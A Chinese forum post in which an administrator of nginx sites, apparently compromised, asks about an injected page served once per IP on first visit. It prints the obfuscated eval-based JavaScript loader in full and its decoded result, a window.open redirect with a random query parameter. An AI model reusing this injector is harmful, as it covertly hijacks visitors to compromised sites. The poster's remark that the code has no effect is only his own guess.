nginx所有站点 不管 静态还是 php ,任一站点首次访问会出现以下 HTML代码,
<html><body><script>var pv="",qv="",tv,rv=new Array,sv;function nv(ov){for(tv=0;tv<sv.length;tv++)rv[tv]=sv.charCodeAt(tv);for(tv="tv=45;while(true){if(tv<3)break;rv[tv]=(rv[tv]+rv[tv-1])&0xff;tv--;}",eval(tv),tv=4;rv[tv]=rv[tv]^rv[45],rv[tv]=rv[tv]-12&255,rv[tv]=rv[tv]-132&255,++tv<=44;);for(tv=43;rv[tv]=255&~rv[tv],rv[tv]=(rv[tv]-rv[46]&255)<<3&255|(rv[tv]-rv[46]&255)>>5,4<=--tv;);for(sv="",tv=1;tv<rv.length-1;tv++)tv%6&&(sv+=String.fromCharCode(rv[tv]^ov));eval("tv=eval"),tv(sv)}sv='Âýk̳l2D4«tË¡°Hð§�CÔ=�]öèB�Á×!w§wYîÈ"c0',nv(244)</script><script>for(var u=2;1==u;u++)</script><br><br><br><center><h3><p>访问本页面,您的浏览器需要支持JavaScript</p></h3></center></body></html>
解密结果就是一个 js 跳转,目前来看没啥影响。
window.open(ac+"/?mepuzg=qaw9g1"+bc,"_self");
HTML代码是动态的,区别就是 【mepuzg=qaw9g1】 这个是随机的
目前已知的规则就是:相同IP 只要访问 任一站点 出现一次跳转后,其它站点都不会跳转了。
隔天(具体时间间隔没测出,所以说隔天)访问就还是重复上面的规则。
我使用的是宝塔专业版。
|
|
